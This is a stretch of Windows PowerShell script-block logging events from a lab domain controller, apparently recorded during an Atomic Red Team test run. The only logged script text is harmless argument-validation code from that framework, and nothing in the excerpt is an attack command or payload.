Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469415
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469414
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469413
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469412
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469411
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469410
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469409
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469408
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469407
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469406
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469405
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469404
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469403
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469402
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469401
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469400
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469399
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469398
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469397
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469396
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469395
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469394
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469393
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469392
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{
                    if ($InputArgumentNamesFromExecutor -notcontains $_) {
                        # Write a warning since this scenario is not considered a breaking change
                        Write-Warning "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] The following input argument is defined but not utilized: '$_'."
                    }
                }

ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\Get-AtomicTechnique.ps1
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469391
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469390
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469389
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{
                    if ($InputArgumentNames -notcontains $_) {
                        Write-Error "$ErrorStringPrefix[Atomic test name: $($AtomicTestInstance.name)] The following input argument was specified but is not defined: '$_'"
                        return
                    }
                }

ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\Get-AtomicTechnique.ps1
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469388
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469387
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469386
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469385
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469384
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469383
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ $_.Name -eq 'ArgName' }

ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\Get-AtomicTechnique.ps1
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469382
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469381
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ $Regex.Matches($_) }

ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Path: C:\AtomicRedTeam\invoke-atomicredteam\Public\Get-AtomicTechnique.ps1
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469380
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469379
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469378
Keywords=None
Message=Creating Scriptblock text (1 of 1):


ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Path:
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469377
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469376
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469375
Keywords=None
Message=Creating Scriptblock text (1 of 1):


ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Path:
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469820
Keywords=None
Message=Completed invocation of ScriptBlock ID: 36320e36-7bcd-409f-b596-416f1e7b52dc
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469819
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9e811b2d-9c33-4fcd-ba74-15cb6564c169
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469818
Keywords=None
Message=Started invocation of ScriptBlock ID: 9e811b2d-9c33-4fcd-ba74-15cb6564c169
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469817
Keywords=None
Message=Completed invocation of ScriptBlock ID: dae4bd6a-2638-496e-a121-925cb0818c43
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469816
Keywords=None
Message=Started invocation of ScriptBlock ID: dae4bd6a-2638-496e-a121-925cb0818c43
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469815
Keywords=None
Message=Completed invocation of ScriptBlock ID: 92801502-0f4d-4080-b7ec-797963784464
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469814
Keywords=None
Message=Completed invocation of ScriptBlock ID: c9165272-9665-487d-84f2-51cbab382e4f
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469813
Keywords=None
Message=Completed invocation of ScriptBlock ID: a7d62484-1782-43fb-bf8e-f58581262544
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469812
Keywords=None
Message=Started invocation of ScriptBlock ID: a7d62484-1782-43fb-bf8e-f58581262544
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469811
Keywords=None
Message=Started invocation of ScriptBlock ID: c9165272-9665-487d-84f2-51cbab382e4f
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469810
Keywords=None
Message=Started invocation of ScriptBlock ID: 92801502-0f4d-4080-b7ec-797963784464
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469809
Keywords=None
Message=Started invocation of ScriptBlock ID: 36320e36-7bcd-409f-b596-416f1e7b52dc
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469808
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2e123301-e8bd-4ee2-8104-19a55bf041fc
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469807
Keywords=None
